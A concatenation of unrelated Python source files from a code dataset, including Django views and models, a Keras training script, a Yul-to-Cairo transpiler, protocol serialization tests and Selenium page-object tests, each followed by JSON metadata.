self.active_banner\n\t\tcontext['tracking_banner_stat'] = self.tracking_banner_stat()\n\n\t\treturn context\n\n\n# Authorize and redirect to the desired url\n\nclass AuthorizeRedirect(RedirectView):\n\n\tpermanent = False\n\tquery_string = False\n\tpattern_name = 'authorize-redirect'\n\n\tdef get_redirect_url(self, *args, **kwargs):\n\t\tself.url = 'https://www.google.com'\n\t\treturn super(AuthorizeRedirect, self).get_redirect_url(*args, **kwargs)\n\n\nclass HotspotLogin(TemplateView):\n\n\ttemplate_name = 'front/login.html'\n\n\n# class HotspotAuth(TemplateView):\n\n#\tdef hotspot_auth(request):\n#\t\tif request.method == 'POST':\n\ndef router_auth(request):\n\tif request.method == 'POST':\n\t\tclient_name = request.POST.get('client')\n\t\tuserid = get_object_or_404(User, username=client_name)\n\t\tprofile = get_object_or_404(Profile, user=userid)\n\t\trouter_username = profile.router_username\n\t\trouter_pass = profile.router_pass\n\t\trouter_address = 'http://172.16.16.1/login'\n\n\t\tresponse_data = {\n\t\t\t'username': router_username,\n\t\t\t'password': router_pass,\n\t\t\t}\n\n\t\tpost_data = {\n\t\t\t'username': router_username,\n\t\t\t'password': router_pass,\n\t\t\t}\n\n\t\treq = urllib2.Request(router_address, data=post_data)\n\n\t\ttry:\n\t\t\tcont = urllib2.urlopen(req)\n\t\texcept urllib2.URLError as e:\n\t\t\terror_data = { \n\t\t\t\t'e_code': e.reason[0],\n\t\t\t\t'e_reason': e.reason[1],\n\t\t\t}\n\n\t\treturn HttpResponse(\n\t\t\tjson.dumps(error_data),\n\t\t\tcontent_type=\"application/json\"\n\t\t\t)\n\telse:\n\t\treturn HttpResponse(\n\t\t\tjson.dumps({\"nothing to see\": \"this isn't happening\"}),\n\t\t\tcontent_type=\"application/json\"\n\t\t)\n","sub_path":"banners/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568327641","text":"from django.db import models\n\n\nclass Order(models.Model):\n FORMING = 'FM'\n SENT_TO_PROCEED = 'STP'\n PROCEEDED = 'PRD'\n PAID = 'PD'\n READY = 'RDY'\n CANCEL = 'CNC'\n\n ORDER_STATUS_CHOICES = (\n (FORMING, 'формируется'),\n (SENT_TO_PROCEED, 'отправлен в обработку'),\n (PAID, 'оплачен'),\n (PROCEEDED, 'обрабатывается'),\n (READY, 'готов к выдаче'),\n (CANCEL, 'отменен'),\n )\n\n user = models.ForeignKey(\n 'customers.Customer',\n on_delete=models.CASCADE\n )\n\n created = models.DateTimeField(\n auto_now_add=True\n )\n modified = models.DateTimeField(\n auto_now=True\n )\n status = models.CharField(\n max_length=3,\n choices=ORDER_STATUS_CHOICES,\n default=FORMING\n )\n is_active = models.BooleanField(\n default=True,\n db_index=True,\n )\n\n def get_total_quantity(self):\n # общее количество товаров\n items = self.items.select_related()\n return sum(list(map(lambda item: item.quantity, items)))\n\n def get_product_type_quantity(self):\n # количество уникальных товаров\n items = self.items.select_related()\n return len(items)\n\n def get_order_price(self):\n # стоимость всего заказа\n items = self.items.select_related('product')\n return sum(list(map(lambda item: item.get_order_item_price, items)))\n\n def delete(self):\n # удаляем заказ, при этом добавляем количество товаров из заказа на склад\n for item in self.items.select_related():\n item.product.quantity += item.quantity\n item.product.save()\n self.is_active = False\n self.status = 'CNC'\n self.save()\n\n # def save(self, *args, **kwargs):\n # # проверяем, что мы редактируем уже существующий заказ\n # if self.pk:\n # self.product.quantity -= self.quantity - self.__class__.objects.get(id=self.pk).quantity\n # else:\n # self.product.quantity -= self.quantity\n\n def __str__(self):\n full_name = self.user.get_full_name()\n username = full_name if full_name else self.user.username\n return f'{username}, order: {self.id}, created: {self.created.strftime(\"%Y-%m-%d %H:%M\")}'\n\n def __repr__(self):\n full_name = self.user.get_full_name()\n username = full_name if full_name else self.user.username\n return f'{username}, order: {self.id}, created: {self.created.strftime(\"%Y-%m-%d %H:%M\")}'\n\n\nclass OrderItemQueryset(models.QuerySet):\n\n def delete(self, *args, **kwargs):\n for object in self:\n object.product.quantity += object.quantity\n object.product.save()\n super(OrderItemQueryset, self).delete(*args, **kwargs)\n\n\nclass OrderItem(models.Model):\n objects = OrderItemQueryset.as_manager()\n order = models.ForeignKey(\n Order,\n on_delete=models.CASCADE,\n related_name='items'\n )\n\n product = models.ForeignKey(\n 'products.Product',\n on_delete=models.CASCADE\n )\n\n quantity = models.PositiveIntegerField()\n\n @property\n def get_order_item_price(self):\n # стоимость позиции\n return self.product.now_price * self.quantity\n\n def delete(self, using=None, keep_parents=False):\n # при удалении товара его количество возвращается на склад\n self.product.quantity += self.quantity\n self.product.save()\n super(self.__class__, self).delete()\n\n def save(self, *args, **kwargs):\n # проверяем, что мы редактируем уже существующий заказ\n if self.pk:\n self.product.quantity -= self.quantity - self.__class__.objects.get(id=self.pk).quantity\n else:\n self.product.quantity -= self.quantity\n self.product.save()\n super(self.__class__, self).save(*args, **kwargs)\n\n def __str__(self):\n return self.product.name + '_orderitem'\n","sub_path":"myshop/ordersapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531290687","text":"import time\nfrom datetime import datetime\nimport os\nimport hashlib\nimport json\n\n\"\"\"\nCreate and update sync file in given directory\n\nAuthor: Hayden Knowles\n\"\"\"\n\ndef get_hash(file_name):\t\t\t\t# SHA-256 hash function\n with open(file_name, 'rb') as f:\n m = hashlib.sha256()\n m.update(f.read())\n sha = m.hexdigest()\n return sha\n\ndef update_sync(directory):\n\t# get list of files in directories\n\tfiles1 = os.listdir(directory)\n\n\tif '.sync' in os.listdir(directory):\t\t\t# find sync file if it exists and open\n\t\twith open(directory + '.sync') as data:\n\t\t\tdictionary = json.load(data)\n\telse:\n\t\tdictionary = {}\n\t\topen(directory + '.sync', 'x')\t# create new sync file if none exists\n\n\tfor file_name in files1:\t\t\t\t\t# loop through files and update or append to dictionary\n\t\tif os.path.isfile(directory + file_name) and file_name != '.sync':\n\t\t\tif file_name not in dictionary:\t\t# add entry if file does not exist in sync file\n\t\t\t\tdictionary[file_name] = []\n\t\t\t\tdictionary[file_name].append([time.strftime(\"%Y-%m-%d %H:%M:%S %z\", time.localtime(os.path.getmtime(directory + file_name))), get_hash(directory + file_name)])\n\t\t\telse:\n\t\t\t\titem = dictionary[file_name][0]\n\t\t\t\tif get_hash(directory + file_name) == item[1]:\n\t\t\t\t\tcurr_file = datetime.fromtimestamp(time.mktime(time.localtime(os.path.getmtime(directory + file_name))))\n\t\t\t\t\titem_date = datetime.fromtimestamp(time.mktime(time.strptime(item[0], '%Y-%m-%d %H:%M:%S %z')))\n\t\t\t\t\tif curr_file != item_date:\n\t\t\t\t\t\tmtime = time.mktime(item_date.timetuple()) + item_date.microsecond / 1E6\n\t\t\t\t\t\tos.utime(directory + file_name, (mtime, mtime))\n\t\t\t\telse:\n\t\t\t\t\t# add new entry if file has been changed\n\t\t\t\t\tdictionary[file_name].insert(0, [time.strftime('%Y-%m-%d %H:%M:%S %z', time.localtime(os.path.getmtime(directory + file_name))), get_hash(directory + file_name)])\n\t\telif os.path.isdir(directory + file_name):\t\t# a directory\n\t\t\tupdate_sync(directory + file_name + '/')\n\tfor item in dictionary:\n\t\tif item not in files1:\n\t\t\tdictionary[item][0][1] = \"deleted\"\n\tprint(directory)\n\tprint(dictionary)\n\tsync = open(directory + '.sync', 'w')\n\t# write changes to json file:\n\tjson.dump(dictionary, sync, indent=4)","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460874560","text":"\"\"\"\nProject Euler 46:It was proposed by Christian Goldbach that every odd composite number can be written as the sum of a prime and twice a square.\n\n9 = 7 + 2×1^2\n15 = 7 + 2×2^2\n21 = 3 + 2×3^2\n25 = 7 + 2×3^2\n27 = 19 + 2×2^2\n33 = 31 + 2×1^2\n\nIt turns out that the conjecture was false.\n\nWhat is the smallest odd composite that cannot be written as the sum of a prime and twice a square\n\n\n\"\"\"\n\ndef run():\n \n n = 5\n f = 1\n primes = set()\n\n while True:\n if all(n % p for p in primes):\n primes.add(n)\n else:\n if not any((n-2*i*i) in primes for i in range(1, n)):\n break\n n += 3-f\n f = -f\n\n print(\"the smallest odd composite that cannot be written as the sum of a prime and twice a square =\",n)\nif __name__ == '__main__':\n\trun()\n","sub_path":"euler/046.py","file_name":"046.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31072355","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Speciallan\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D, GlobalAvgPool2D, GlobalAveragePooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense,Input\nfrom keras.optimizers import SGD\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.applications import VGG16, ResNet50, InceptionV3\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import Model\nfrom keras.callbacks import EarlyStopping\nfrom keras.models import load_model\nfrom data_loader import build_generator, generator\nfrom model_builder import build_bcnn\n\n\nK.set_image_dim_ordering('tf')\n\nWEIGHTS_PATH = 'vgg16_weights_tf_dim_ordering_tf_kernels.h5'\nWEIGHTS_PATH_NO_TOP = 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'\n# img_width, img_height = 200,200\n# img_width, img_height = 224,224\nimg_width, img_height = 224,224\nnum_classes = 3\n\nmodel = build_bcnn(\n all_trainable=True,\n size_height=img_height,\n size_width=img_width,\n no_class=num_classes,\n # learning_rate=1e-3,\n learning_rate=1.0,\n decay_learning_rate=0.1,\n decay_weight_rate=1e-8\n)\n\n# model.load_weights('./model/cloth_bcnn.h5')\n\ntrain_data_dir = '../../data/cloth/splitted/train'\nvalid_data_dir = '../../data/cloth/splitted/valid'\nnb_train_samples = 25712\nnb_validation_samples = 6428\nepochs = 10\nbatch_size = 32\nclasses = ['01', '02', '99']\n\n# train_generator, valid_generator = build_generator(\n# train_dir=train_data_dir,\n# valid_dir=validation_data_dir,\n# target_size=(img_height, img_width),\n# batch_size=batch_size)\n\ntrain_generator = generator(train_data_dir, classes=classes, batch_size=batch_size, target_size=(img_height, img_width))\nvalid_generator = generator(valid_data_dir, classes=classes, batch_size=batch_size, target_size=(img_height, img_width))\n\n# (16, 224, 224, 3) , (16, 3)\n\n# t = next(train_generator)\n# print(t[0].shape, t[1].shape)\n# exit()\n\npath_model = './model/cloth_bcnn_'\ncallack_saver = keras.callbacks.ModelCheckpoint(\n path_model\n + \"e_{epoch:02d}\"\n + \"_loss_{val_loss:.3f}\"\n + \"_acc_{val_acc:.3f}\"\n + \".h5\"\n , monitor='val_loss'\n , verbose=0\n , mode='auto'\n , period=1\n , save_best_only=True\n )\ncallback_reducer = keras.callbacks.ReduceLROnPlateau(\n monitor='val_loss'\n , factor=0.1\n , min_lr=1e-6\n , min_delta=1e-3\n , patience=5\n )\ncallback_stopper = keras.callbacks.EarlyStopping(\n monitor='val_loss'\n , min_delta=1e-3\n , patience=5\n , verbose=0\n , mode='auto'\n )\nlist_callback = [\n callack_saver\n ,callback_reducer\n # ,callback_stopper\n]\n\n\n\nmodel.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs,\n validation_data=valid_generator,\n validation_steps=nb_validation_samples // batch_size,\n callbacks=list_callback)\n\nmodel.save_weights('model/cloth_bcnn.h5')\n\n\n","sub_path":"cloth_bcnn_train.py","file_name":"cloth_bcnn_train.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436659930","text":"import matplotlib.pyplot as plt\r\nimport networkx as nx\r\n\r\n\r\nclass Graph:\r\n def __init__(self):\r\n self.edges = []\r\n self.names = []\r\n\r\n def addEdge(self, a, b, name):\r\n self.edges.append([a, b])\r\n self.names.append(((a, b), name))\r\n\r\n def visualize(self):\r\n G = nx.DiGraph()\r\n G.add_edges_from(self.edges)\r\n pos = nx.spring_layout(G)\r\n\r\n plt.figure()\r\n\r\n nx.draw(G, pos, edge_color='black', width=1, linewidths=1, node_size=600,node_color='green', alpha=0.9, labels={node: node for node in G.nodes()})\r\n\r\n nx.draw_networkx_edge_labels(G, pos, edge_labels=dict(self.names), font_color='red' )\r\n plt.axis('off')\r\n plt.show()\r\n\r\n def print_name(self):\r\n print(self.names)\r\n\r\n\r\nG = Graph()\r\n\r\nn, m = [int(x) for x in input().split()]\r\n\r\n# print(n,m)\r\n\r\nfor i in range(0, m):\r\n x, y = [int(p) for p in input().split()]\r\n G.addEdge(x, y, \"x\")\r\n# G.print_name()\r\nG.visualize()\r\n","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39142890","text":"# 1. The Python type for storing true and false values is called Boolean\n# (2 == 3, 5 = 5, 7 < 8)\n\n# 2. Flow chart là một loại sơ đồ biểu diễn một thuật toán hoặc một quá trình,\n# biểu hiện các bước công việc dưới dạng các loại hình hôp khác nhau \n# theo thứ tự được biểu diễn bởi các mũi tên.\n\n# 3. hàm lồng nhau là hàm có cấu trúc if…elif…else\n# bên trong cấu trúc if…elif…else khác\n\n# vd:\nx = 10\ny = 10\n\nif x < y:\n print(\"x is less than y\")\nelse:\n if x > y:\n print(\"x is greater than y\")\n else:\n print(\"x and y must be equal\")\n","sub_path":"session2/answer_questions.py","file_name":"answer_questions.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"621571757","text":"from __future__ import annotations\n\nfrom collections import defaultdict\nfrom typing import Optional\n\nimport solcx\nfrom starkware.cairo.lang.compiler.parser import parse_file\n\nimport yul.yul_ast as ast\nfrom transpiler.Imports import merge_imports, UINT256_MODULE, format_imports\nfrom yul.BuiltinHandler import YUL_BUILTINS_MAP\nfrom yul.utils import STORAGE_DECLS\nfrom yul.yul_ast import AstVisitor\n\nUINT128_BOUND = 2 ** 128\n\nCOMMON_IMPORTS = {\n \"starkware.cairo.common.registers\": {\"get_fp_and_pc\"},\n \"starkware.cairo.common.dict_access\": {\"DictAccess\"},\n \"starkware.cairo.common.math_cmp\": {\"is_le\"},\n \"starkware.cairo.common.default_dict\": {\n \"default_dict_new\",\n },\n \"starkware.cairo.common.uint256\": {\"Uint256\", \"uint256_eq\"},\n \"starkware.cairo.common.cairo_builtins\": {\"HashBuiltin\"},\n \"starkware.starknet.common.storage\": {\"Storage\"},\n \"evm.utils\": {\"update_msize\"},\n}\n\n# TODO we should rather analyze the tree, than rely on textual presentation\nDISCARD = \"\"\" assert 0 = 1\n return ()\"\"\"\n\nMAIN_PREAMBLE = \"\"\"%lang starknet\n%builtins pedersen range_check\n\"\"\"\n\n\nclass ToCairoVisitor(AstVisitor):\n def __init__(self, sol_source: str):\n super().__init__()\n self.preamble: bool = False\n self.n_names: int = 0\n self.solc_version: float = self.get_source_version(sol_source)\n self.validate_solc_ver()\n self.public_functions = self.get_public_functions(sol_source)\n self.imports = defaultdict(set)\n self.discarded_warp_blocks: list[str] = []\n merge_imports(self.imports, COMMON_IMPORTS)\n self.last_function: Optional[ast.FunctionDefinition] = None\n\n def get_source_version(self, sol_source: str) -> float:\n code_split = sol_source.split(\"\\n\")\n for line in code_split:\n if \"pragma\" in line:\n ver: float = float(line[line.index(\"0.\") + 2 :].replace(\";\", \"\"))\n if ver < 8.0:\n raise Exception(\n \"Please use a version of solidity that is at least 0.8.0\"\n )\n return ver\n raise Exception(\"No Solidity version specified in contract\")\n\n def check_installed_solc(self, source_version: float) -> str:\n solc_vers = solcx.get_installed_solc_versions()\n vers_clean = []\n src_ver = \"0.\" + str(source_version)\n for ver in solc_vers:\n vers_clean.append(\".\".join(str(x) for x in list(ver.precedence_key)[:3]))\n if src_ver not in vers_clean:\n solcx.install_solc(src_ver)\n return src_ver\n\n def validate_solc_ver(self):\n src_ver: str = self.check_installed_solc(self.solc_version)\n solcx.set_solc_version(src_ver)\n\n def get_public_functions(self, sol_source: str) -> list[str]:\n public_functions = set()\n abi = solcx.compile_source(sol_source, output_values=[\"hashes\"])\n for value in abi.values():\n for v in value[\"hashes\"]:\n public_functions.add(f\"fun_{v[:v.find('(')]}\")\n return list(public_functions)\n\n def translate(self, node: ast.Node) -> str:\n main_part = self.print(node)\n return \"\\n\".join(\n [\n MAIN_PREAMBLE,\n format_imports(self.imports),\n STORAGE_DECLS,\n main_part,\n ]\n )\n\n def print(self, node: ast.Node, *args, **kwargs) -> str:\n return self.visit(node, *args, **kwargs)\n\n def common_visit(self, node: ast.Node, *args, **kwargs):\n raise AssertionError(\n f\"Each node type should have a custom visit, but {type(node)} doesn't\"\n )\n\n def visit_typed_name(self, node: ast.TypedName, split: bool = False) -> str:\n if not split:\n return f\"{node.name} : {node.type}\"\n assert node.type == \"Uint256\", \"Can't split non Uin256 type\"\n # could have added \": felt\", but when a type is omitted, it's felt by default\n return f\"{node.name}_low, {node.name}_high\"\n\n def visit_literal(self, node: ast.Literal) -> str:\n v = int(node.value) # to convert bools: True -> 1, False -> 0\n high, low = divmod(v, UINT128_BOUND)\n return f\"Uint256(low={low}, high={high})\"\n\n def visit_identifier(self, node: ast.Identifier) -> str:\n return f\"{node.name}\"\n\n def generate_ids_typed(self, variable_names, function_name: str = \"\"):\n variables = []\n for var in variable_names:\n var_repr = self.print(var)\n if \"Uint256\" not in var_repr:\n var_repr += \": Uint256\"\n variables.append(var_repr)\n return \", \".join(\"local \" + x for x in variables)\n\n def remove_checked(self, args_repr: str, function_name: str) -> str:\n if \"checked_add\" in function_name:\n return f\"u256_add({args_repr})\"\n elif \"checked_sub\" in function_name:\n return f\"uint256_sub({args_repr})\"\n elif \"revert\" in function_name:\n return f\"assert 0 = 1\"\n else:\n return f\"{function_name}({args_repr})\"\n\n def visit_assignment(self, node: ast.Assignment) -> str:\n self.preamble = False\n value_repr: str = self.print(node.value)\n if isinstance(node.value, ast.FunctionCall):\n function_name = node.value.function_name.name\n function_args: str = \", \".join(self.print(x) for x in node.value.arguments)\n ids_repr: str = self.generate_ids_typed(node.variable_names, function_name)\n self.preamble = True\n if function_name in YUL_BUILTINS_MAP.keys():\n builtin_to_cairo = YUL_BUILTINS_MAP[function_name](function_args)\n merge_imports(self.imports, builtin_to_cairo.required_imports())\n if not node.variable_names:\n return builtin_to_cairo.generated_cairo\n else:\n return f\"\"\"{builtin_to_cairo.preamble}\nlet ({ids_repr}) = {builtin_to_cairo.function_call}\n{builtin_to_cairo.ref_copy}\"\"\"\n else:\n call = self.remove_checked(function_args, function_name)\n if not node.variable_names:\n return value_repr\n else:\n ids_repr: str = \", \".join(\n self.print(x) for x in node.variable_names\n )\n if function_name in self.public_functions:\n ids_repr_felt = self.to_high_low_felt(ids_repr)\n return f\"let ({ids_repr_felt}) = {call}\\n\" + self.init_u256(\n ids_repr\n )\n else:\n return f\"let ({ids_repr}) = {call}\\n\"\n\n else:\n ids_repr: str = self.generate_ids_typed(node.variable_names)\n self.preamble = True\n return f\"{ids_repr} = {value_repr}\"\n\n def visit_function_call(self, node: ast.FunctionCall) -> str:\n fun_repr = self.print(node.function_name)\n args_repr = \", \".join(self.print(x) for x in node.arguments)\n if fun_repr in self.public_functions:\n args_repr = self.to_high_low_felt(args_repr)\n if fun_repr == \"revert\":\n return \"assert 0 = 1\"\n elif fun_repr.startswith(\"checked_add\"):\n merge_imports(self.imports, {\"evm.uint256\": {\"u256_add\"}})\n return f\"u256_add({args_repr})\"\n elif fun_repr.startswith(\"checked_sub\"):\n merge_imports(self.imports, {UINT256_MODULE: {\"uint256_sub\"}})\n return f\"uint256_sub({args_repr})\"\n elif fun_repr in self.discarded_warp_blocks or \"panic_error\" in fun_repr:\n return \"assert 0 = 1\"\n elif fun_repr in YUL_BUILTINS_MAP.keys():\n builtin_to_cairo = YUL_BUILTINS_MAP[fun_repr](args_repr)\n merge_imports(self.imports, builtin_to_cairo.required_imports())\n if self.preamble:\n return f\"\"\"{builtin_to_cairo.preamble}\n{builtin_to_cairo.function_call}\n{builtin_to_cairo.ref_copy}\"\"\"\n else:\n return f\"{builtin_to_cairo.function_call}\"\n else:\n return f\"{fun_repr}({args_repr})\"\n\n def visit_expression_statement(self, node: ast.ExpressionStatement) -> str:\n if isinstance(node.expression, ast.FunctionCall):\n return self.visit(node.expression)\n else:\n # see ast.ExpressionStatement docstring\n raise ValueError(\"What am I going to do with it? Why is it here?..\")\n\n def visit_variable_declaration(self, node: ast.VariableDeclaration) -> str:\n self.preamble = False\n if node.value is None:\n decls_repr = \"\\n\".join(\n self.print(ast.VariableDeclaration(variables=[x], value=ast.Literal(0)))\n for x in node.variables\n )\n self.preamble = True\n return decls_repr\n value_repr = self.print(node.value)\n if isinstance(node.value, ast.FunctionCall):\n function_name: str = node.value.function_name.name\n function_args: str = \", \".join(self.print(x) for x in node.value.arguments)\n func_call: str = self.print(node.value)\n vars_repr = self.generate_ids_typed(node.variables, function_name)\n if function_name in YUL_BUILTINS_MAP:\n builtin_to_cairo = YUL_BUILTINS_MAP[function_name](function_args)\n merge_imports(self.imports, builtin_to_cairo.required_imports())\n self.preamble = True\n if not node.variables:\n return builtin_to_cairo.generated_cairo\n else:\n return f\"\"\"{builtin_to_cairo.preamble}\nlet ({vars_repr}) = {builtin_to_cairo.function_call}\n{builtin_to_cairo.ref_copy}\"\"\"\n else:\n if not node.variables:\n return value_repr\n else:\n if function_name in self.public_functions:\n vars_repr_felt = self.to_high_low_felt(vars_repr)\n return (\n f\"let ({vars_repr_felt}) = {function_name}({self.to_high_low_felt(function_args)})\\n\"\n + self.init_u256(vars_repr)\n )\n elif \"mapping_index\" in function_name:\n return f\"\"\"let ({vars_repr}) = {function_name}({function_args})\nlocal range_check_ptr = range_check_ptr\nlocal memory_dict : DictAccess* = memory_dict\nlocal msize = msize\"\"\"\n else:\n return f\"let ({vars_repr}) = {func_call}\"\n\n else:\n self.preamble = True\n vars_repr = self.generate_ids_typed(node.variables)\n return f\"{vars_repr} = {value_repr}\"\n\n def visit_block(self, node: ast.Block) -> str:\n return \"\\n\".join(self.print(x) for x in node.statements)\n\n def to_high_low_felt(self, vars: str) -> str:\n if vars != \"\":\n vars = vars.replace(\" : Uint256\", \"\")\n vars = vars.split(\",\")\n params_repr = \", \".join(f\"{p.strip()}_low, {p.strip()}_high\" for p in vars)\n return params_repr\n else:\n return vars\n\n def init_u256(self, params_repr: str) -> str:\n params = params_repr.replace(\" : Uint256\", \"\")\n params = params.split(\",\")\n declr_str = \"\"\n for p in params:\n if \"local\" in p:\n p_no_local = p.replace(\"local\", \"\").strip()\n declr_str += (\n f\"{p}: Uint256 = Uint256({p_no_local}_low, {p_no_local}_high)\\n\"\n )\n else:\n declr_str += f\"local {p}: Uint256 = Uint256({p}_low, {p}_high)\\n\"\n return declr_str\n\n def visit_function_definition(self, node: ast.FunctionDefinition):\n self.last_function = node\n taboos = [\"abi_\", \"checked_\", \"getter_\", \"panic_error\"]\n if any(taboo in node.name for taboo in taboos):\n return \"\"\n external = node.name in self.public_functions\n params_repr = \", \".join(self.print(x, split=external) for x in node.parameters)\n returns_repr = \", \".join(\n self.print(x, split=external) for x in node.return_variables\n )\n body_repr = self.print(node.body)\n external_function: str = \"\"\n if external:\n combine_split_params = \"\\n\".join(\n f\"local {x.name}: Uint256 = Uint256({x.name}_low, {x.name}_high)\"\n for x in node.parameters\n )\n body_repr = combine_split_params + \"\\n\" + body_repr\n external_function: str = (\n f\"@external\\n\"\n f\"func {node.name}_external({params_repr}) -> ({returns_repr}):\\n\"\n f\"alloc_locals\\n\"\n f\"let (local memory_dict: DictAccess*) = default_dict_new(0)\\n\"\n f\"tempvar msize = 0\\n\"\n f\"return {node.name}{{msize=msize, memory_dict=memory_dict}}\"\n f\" ({params_repr})\\n\"\n f\"end\\n\\n\"\n )\n\n func = (\n f\"{external_function}\"\n f\"func {node.name}\"\n f\"{{range_check_ptr, pedersen_ptr: HashBuiltin*\"\n f\", storage_ptr: Storage*, memory_dict: DictAccess*, msize}}\"\n f\"({params_repr}) -> ({returns_repr}):\\n\"\n f\"alloc_locals\\n\"\n f\"{body_repr}\\n\"\n f\"end\\n\"\n )\n func = parse_file(func).format()\n\n if (\"__warp_block\" in node.name) and (DISCARD in func):\n self.discarded_warp_blocks.append(node.name)\n return \"\"\n else:\n return func\n\n def visit_if(self, node: ast.If) -> str:\n cond_repr = self.print(node.condition)\n body_repr = self.print(node.body)\n else_repr = \"\"\n if node.else_body:\n else_repr = f\"else:\\n\\t{self.print(node.else_body)}\\n\"\n return (\n f\"if {cond_repr}.low + {cond_repr}.high != 0:\\n\"\n f\"\\t{body_repr}\\n\"\n f\"{else_repr}\"\n f\"end\"\n )\n\n def visit_case(self, node: ast.Case):\n return AssertionError(\"There should be no cases, run SwitchToIfVisitor first\")\n\n def visit_switch(self, node: ast.Switch):\n return AssertionError(\n \"There should be no switches, run SwitchToIfVisitor first\"\n )\n\n def visit_for_loop(self, node: ast.ForLoop):\n raise AssertionError(\n \"There should be no for loops, run ForLoopEliminator first\"\n )\n\n def visit_break(self, node: ast.Break):\n raise AssertionError(\"There should be no breaks, run ForLoopEliminator first\")\n\n def visit_continue(self, node: ast.Continue):\n raise AssertionError(\n \"There should be no continues, run ForLoopEliminator first\"\n )\n\n def visit_leave(self, node: ast.Leave) -> str:\n return_names = \", \".join(x.name for x in self.last_function.return_variables)\n return f\"return ({return_names})\"\n","sub_path":"warp/yul/ToCairoVisitor.py","file_name":"ToCairoVisitor.py","file_ext":"py","file_size_in_byte":15017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461258983","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"This module contains the tests for the FIPA protocol.\"\"\"\nimport base64\nimport json\n\nfrom aea.mail.base import Envelope\nfrom aea.protocols.fipa.message import FIPAMessage\nfrom aea.protocols.fipa.serialization import FIPASerializer\nfrom aea.protocols.oef.models import Description\n\n\ndef test_fipa_cfp_serialization():\n \"\"\"Test that the serialization for the 'fipa' protocol works.\"\"\"\n query = base64.b64encode(json.dumps({\"foo\": \"bar\"}).encode(\"utf-8\"))\n msg = FIPAMessage(message_id=0, dialogue_id=0, target=0, performative=FIPAMessage.Performative.CFP, query=query)\n msg_bytes = FIPASerializer().encode(msg)\n envelope = Envelope(to=\"receiver\", sender=\"sender\", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)\n envelope_bytes = envelope.encode()\n\n actual_envelope = Envelope.decode(envelope_bytes)\n expected_envelope = envelope\n assert expected_envelope == actual_envelope\n\n actual_msg = FIPASerializer().decode(actual_envelope.message)\n expected_msg = msg\n assert expected_msg == actual_msg\n\n\ndef test_fipa_propose_serialization():\n \"\"\"Test that the serialization for the 'fipa' protocol works.\"\"\"\n proposal = [\n Description({\"foo1\": 1, \"bar1\": 2}), # DataModel(\"dm_bar\", [AttributeSchema(\"foo1\", int, True), AttributeSchema(\"bar1\", int, True)]))\n Description({\"foo2\": 1, \"bar2\": 2}),\n ]\n msg = FIPAMessage(message_id=0, dialogue_id=0, target=0, performative=FIPAMessage.Performative.PROPOSE, proposal=proposal)\n msg_bytes = FIPASerializer().encode(msg)\n envelope = Envelope(to=\"receiver\", sender=\"sender\", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)\n envelope_bytes = envelope.encode()\n\n actual_envelope = Envelope.decode(envelope_bytes)\n expected_envelope = envelope\n assert expected_envelope == actual_envelope\n\n actual_msg = FIPASerializer().decode(actual_envelope.message)\n expected_msg = msg\n\n p1 = actual_msg.get(\"proposal\")\n p2 = expected_msg.get(\"proposal\")\n assert p1[0].values == p2[0].values\n assert p1[1].values == p2[1].values\n","sub_path":"tests/test_protocols/test_fipa.py","file_name":"test_fipa.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"265395511","text":"import pytest\nimport time\n\nfrom pages.product_page import ProductPage\nfrom pages.cart_page import CartPage\nfrom pages.login_page import LoginPage\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear\"\n\n\nclass TestUserAddToCartFromProductPage(object):\n @pytest.mark.need_review\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n email = str(time.time()) + \"@fakemail.org\"\n password = str(time.time())\n login_page = LoginPage(browser, link)\n login_page.open()\n login_page.go_to_login_page()\n login_page.register_new_user(email, password)\n login_page.should_be_authorized_user()\n\n @pytest.mark.need_review\n def test_user_can_add_product_to_cart(self, browser):\n page = ProductPage(browser, link)\n page.open()\n page.add_to_backet()\n 